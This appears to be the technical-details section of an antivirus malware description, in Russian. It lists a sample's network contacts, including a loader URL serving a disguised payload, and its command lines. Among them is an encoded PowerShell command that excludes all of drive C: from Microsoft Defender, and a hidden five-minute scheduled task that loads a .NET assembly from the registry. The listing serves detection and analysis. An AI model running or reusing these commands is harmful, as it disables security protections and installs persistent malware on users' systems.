Техническая информация
- <SYSTEM32>\tasks\f700
- 'ta###grdev.com':80
- 'microsoft.com':80
- 'ha###.mine.nu':7000
- http://ta###grdev.com/loader/uploads/Ghsxqtj_Kzwryroq.bmp
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'ha###.mine.nu':7000
- DNS ASK ta###grdev.com
- DNS ASK microsoft.com
- DNS ASK ha###.mine.nu
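- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=' (со скрытым окном; аргумент -enc — это Base64 от строки в UTF-16LE, которая декодируется в Set-MpPreference -ExclusionPath 'C:\', то есть весь диск C: добавляется в исключения Microsoft Defender)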
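- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F700 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F700\).F700...' (со скрытым окном; задача планировщика F700 создаётся с запуском каждые 5 минут, а её команда, судя по видимой части, загружает .NET-сборку через Assembly::Load из данных раздела реестра HKCU\Software\F700; команда на странице обрезана)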
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
- '<SYSTEM32>\schtasks.exe' /create /f /sc minute /mo 5 /tn F700 /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load((Get-ItemProperty HKCU:\Software\F700\).F700...